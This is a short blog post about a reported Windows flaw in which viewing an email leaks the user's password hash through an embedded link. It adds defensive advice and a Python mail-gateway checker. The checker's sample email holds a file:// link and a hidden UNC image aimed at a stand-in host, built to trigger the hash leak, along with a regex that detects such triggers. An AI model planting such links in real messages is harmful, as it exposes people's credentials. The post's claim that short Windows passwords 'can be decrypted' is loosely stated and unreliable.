I can get and crack your password hashes from an email -CSO

I love this one. A CSO Online story from a few days ago: you can send someone an email with a certain type of URL in a link somewhere, and if the person uses Windows, viewing the email sends their username and password hash to your system.


This is a new twist on the "IE sends your password" hack already described here, and it's something we should have figured out already. And it's worse, really. Every program on Windows that uses URLs (file dialogs, editors, the desktop itself) has this bug/feature. I can trigger it with Notepad.

So my recommendations: if you can't avoid Windows, use text view for emails, two-factor authentication and long passwords. Long passwords because the longer the password, the less likely it is to be in rainbow tables. And always use a password longer than 15 characters, because Windows passwords shorter than that can be decrypted.
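A mail-gateway check for the kind of link described above, as an added example that is not code from the CSO story or from this post. It assumes the trigger is a file:// URL or a UNC path (two leading backslashes), which the post does not name explicitly; the sample message is constructed.

```python
r"""Flag links in an inbound email that would make a Windows mail client open
an SMB connection (and answer an authentication challenge) when the message
is rendered. Assumption: the trigger is a file:// URL or a UNC path (\\host\share).
Rendering the message as plain text, as the post recommends, avoids the auto-load."""
import email
import re
from email import policy
from html.parser import HTMLParser

# Constructed sample: one benign https link, one file:// link, and one UNC
# path in an <img> tag, which loads without a click when HTML is rendered.
SAMPLE_EML = b"""From: sender@example.test
To: victim@example.test
Subject: invoice
MIME-Version: 1.0
Content-Type: text/html; charset=utf-8

<html><body>
<p>See <a href="https://example.test/invoice">the invoice</a>.</p>
<p>Or <a href="file://203.0.113.5/share/invoice.pdf">open it directly</a>.</p>
<img src="\\\\203.0.113.5\\share\\pixel.png" width="1" height="1">
</body></html>
"""

# Matches a file: scheme or a reference starting with two backslashes (UNC).
SMB_TRIGGER_RE = re.compile(r"^(?:file:|\\\\)", re.IGNORECASE)


class _RefCollector(HTMLParser):
    """Collect every href/src attribute value from an HTML body."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src") and value:
                self.refs.append(value.strip())


def find_smb_leak_refs(raw_eml: bytes) -> list:
    """Return all href/src references in the message that point at file:// or UNC targets."""
    msg = email.message_from_bytes(raw_eml, policy=policy.default)
    hits = []
    for part in msg.walk():  # handles both single-part and multipart messages
        if part.get_content_type() != "text/html":
            continue
        collector = _RefCollector()
        collector.feed(part.get_content())
        hits.extend(ref for ref in collector.refs if SMB_TRIGGER_RE.match(ref))
    return hits


if __name__ == "__main__":
    for ref in find_smb_leak_refs(SAMPLE_EML):
        print("SMB-auth trigger:", ref)
```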

I realize that telling everyone to switch away from Windows is not possible; there is too much invested in it everywhere, and besides, I wouldn't have anything to do. Windows problems and fixes are what keeps the computer industry going.

Hopefully it won't be so long until the next post. Sorry guys.

About echlinm

Computer Programmer/Systems Analyst/Hacker S31
This entry was posted in Computers and Internet.

